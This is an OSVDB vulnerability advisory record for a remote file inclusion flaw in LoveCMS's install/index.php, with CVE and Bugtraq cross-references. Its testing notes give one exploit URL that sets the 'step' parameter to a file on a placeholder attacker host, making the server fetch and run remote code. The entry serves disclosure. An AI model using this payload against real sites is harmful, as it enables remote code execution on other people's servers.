LoveCMS install/index.php step Variable Remote File Inclusion

2007-02-21T06:33:49
ID OSVDB:33516
Type osvdb
Reporter OSVDB
Modified 2007-02-21T06:33:49

Description

Manual Testing Notes

http://[target]/lovecms/install/index.php?step=http://[attacker]/boum.txt?

References:

Secunia Advisory ID:24278 Related OSVDB ID: 33517 Related OSVDB ID: 33519 Related OSVDB ID: 33520 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0416.html FrSIRT Advisory: ADV-2007-0716 CVE-2007-1148 Bugtraq ID: 22675